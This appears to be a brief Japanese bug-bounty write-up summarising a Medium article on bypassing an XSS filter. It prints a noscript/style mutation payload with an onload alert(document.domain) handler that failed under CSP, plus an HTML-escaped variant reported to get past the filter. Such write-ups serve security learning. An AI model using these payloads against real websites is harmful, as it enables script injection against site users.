Hello there, ('ω')ノ
HTMLエスケープを使用してXSSフィルタのバイパスを。
脆弱性:
XSS
記事:
https://medium.com/@adonkidz7/bypass-xss-filter-using-html-escape-f2e06bebc8c3
システムのバグがすべて修正された後、まだ興味があったので。
さらに試してみるとcspによってブロックされているため
下記のペイロードは、失敗して。
<noscript> <p title=” </noscript>
<style onload= alert(document.domain)//”>
*{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} </style>
次に、ペイロードでHTMLエスケープを使用して試してみることに。
下記は、HTMLエスケープを使用した最終的なペイロードで。
<noscript> &lt;p title=” </noscript>
<style onload= alert(document.domain)//">
*{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} </style>
W3cubToolsのHTMLエスケープツールを使用して。
XSSフィルタをバイパスすることができて。
https://tools.w3cub.com/html-escape-unescape
Best regards, (^^ゞ
